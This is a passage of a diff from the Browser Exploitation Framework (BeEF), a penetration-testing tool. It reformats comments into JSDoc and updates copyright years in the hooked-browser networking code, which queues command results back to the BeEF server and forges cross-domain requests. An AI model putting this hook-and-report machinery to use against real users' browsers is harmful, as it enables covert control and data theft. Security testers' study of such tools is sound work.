-    // Signals the Framework that the user has lost the hook
+    /** Signals the Framework that the user has lost the hook */
    endSession:function () {
        beef.mitb.sniff("Window closed.");
    }
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -1,12 +1,10 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

-/*!
- * @literal object: beef.net
- *
+/**
 * Provides basic networking functions,
 * like beef.net.request and beef.net.forgeRequest,
 * used by BeEF command modules and the Requester extension,
@@ -15,6 +13,8 @@
 *
 * Also, it contains the core methods used by the XHR-polling
 * mechanism (flush, queue)
+ * @namespace beef.net
+ *
 */
 beef.net = {

@@ -82,11 +82,11 @@ beef.net = {

    /**
     * Queues the specified command results.
-     * @param: {String} handler: the server-side handler that will be called
-     * @param: {Integer} cid: command id
-     * @param: {String} results: the data to send
-     * @param: {Integer} status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
-     * @param: {Function} callback: the function to call after execution
+     * @param {String} handler the server-side handler that will be called
+     * @param {Integer} cid command id
+     * @param {String} results the data to send
+     * @param {Integer} status the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
+     * @param {Function} callback the function to call after execution
     */
    queue: function (handler, cid, results, status, callback) {
        if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
@@ -105,12 +105,12 @@ beef.net = {
     * NOTE: Always send Browser Fingerprinting results
     * (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
     * even if WebSockets are enabled.
-     * @param: {String} handler: the server-side handler that will be called
-     * @param: {Integer} cid: command id
-     * @param: {String} results: the data to send
-     * @param: {Integer} exec_status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
-     * @param: {Function} callback: the function to call after execution
-     * @return: {Integer} exec_status: the command module execution status (defaults to 0 - 'unknown' if status is null)
+     * @param {String} handler the server-side handler that will be called
+     * @param {Integer} cid command id
+     * @param {String} results the data to send
+     * @param {Integer} exec_status the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
+     * @param {Function} callback the function to call after execution
+     * @return {Integer} the command module execution status (defaults to 0 - 'unknown' if status is null)
     */
    send: function (handler, cid, results, exec_status, callback) {
        // defaults to 'unknown' execution status if no parameter is provided, otherwise set the status
@@ -173,8 +173,8 @@ beef.net = {

    /**
     * Split the input data into chunk lengths determined by the amount parameter.
-     * @param: {String} str: the input data
-     * @param: {Integer} amount: chunk length
+     * @param {String} str the input data
+     * @param {Integer} amount chunk length
     */
    chunk: function (str, amount) {
        if (typeof amount == 'undefined') n = 2;
@@ -184,7 +184,7 @@ beef.net = {
    /**
     * Push the input stream back to the BeEF server-side components.
     * It uses beef.net.request to send back the data.
-     * @param: {Object} stream: the stream object to be sent back.
+     * @param {Object} stream the stream object to be sent back.
     */
    push: function (stream, callback) {
        //need to implement wait feature here eventually
@@ -203,18 +203,18 @@ beef.net = {

    /**
     * Performs http requests
-     * @param: {String} scheme: HTTP or HTTPS
-     * @param: {String} method: GET or POST
-     * @param: {String} domain: bindshell.net, 192.168.3.4, etc
-     * @param: {Int} port: 80, 5900, etc
-     * @param: {String} path: /path/to/resource
-     * @param: {String} anchor: this is the value that comes after the # in the URL
-     * @param: {String} data: This will be used as the query string for a GET or post data for a POST
-     * @param: {Int} timeout: timeout the request after N seconds
-     * @param: {String} dataType: specify the data return type expected (ie text/html/script)
-     * @param: {Function} callback: call the callback function at the completion of the method
+     * @param {String} scheme HTTP or HTTPS
+     * @param {String} method GET or POST
+     * @param {String} domain bindshell.net, 192.168.3.4, etc
+     * @param {Int} port 80, 5900, etc
+     * @param {String} path /path/to/resource
+     * @param {String} anchor this is the value that comes after the # in the URL
+     * @param {String} data This will be used as the query string for a GET or post data for a POST
+     * @param {Int} timeout timeout the request after N seconds
+     * @param {String} dataType specify the data return type expected (ie text/html/script)
+     * @param {Function} callback call the callback function at the completion of the method
     *
-     * @return: {Object} response: this object contains the response details
+     * @return {Object} this object contains the response details
     */
    request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
        //check if same domain or cross domain
@@ -307,7 +307,7 @@ beef.net = {
        return response;
    },

-    /*
+    /**
     * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
     *  - requestid: needed on the callback
     *  - allowCrossDomain: set cross-domain requests as allowed or blocked
@@ -490,8 +490,9 @@ beef.net = {
        return response;
    },

-    //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
-    //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
+    /** this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
+     *  http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
+     */
    clean: function (r) {
        if (this.array_has_string_key(r)) {
            var obj = {};
@@ -502,7 +503,7 @@ beef.net = {
        return r;
    },

-    //Detects if an array has a string key
+    /** Detects if an array has a string key */
    array_has_string_key: function (arr) {
        if ($j.isArray(arr)) {
            try {
--- a/core/main/client/net/connection.js
+++ b/core/main/client/net/connection.js
@@ -1,19 +1,22 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

-// beef.net.connection - wraps Mozilla's Network Information API
-// https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
-// https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection
+/**
+ * beef.net.connection - wraps Mozilla's Network Information API
+ * https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
+ * https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection
+ * @namespace beef.net.connection
+ */
 beef.net.connection = {

-  /* Returns the connection type
-   * @example: beef.net.connection.type()
-   * @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type
-   * @return: {String} connection type or 'unknown'.
-   **/
+  /**
+   * Returns the connection type. https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type
+   * @example beef.net.connection.type()
+   * @return {String} connection type or 'unknown'.
+   */
  type: function () {
    try {
      var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
@@ -25,11 +28,11 @@ beef.net.connection = {
    }
  },

-  /* Returns the maximum downlink speed of the connection
-   * @example: beef.net.connection.downlinkMax()
-   * @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax
-   * @return: {String} downlink max or 'unknown'.
-   **/
+  /** 
+   * Returns the maximum downlink speed of the connection. https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax
+   * @example beef.net.connection.downlinkMax()
+   * @return {String} downlink max or 'unknown'.
+   */
  downlinkMax: function () {
    try {
      var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
--- a/core/main/client/net/cors.js
+++ b/core/main/client/net/cors.js
@@ -1,3 +1,7 @@
+/**
+ * @namespace beef.net.cors
+ */
+
 beef.net.cors = {

  handler: "cors",
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .5.3
 .0.3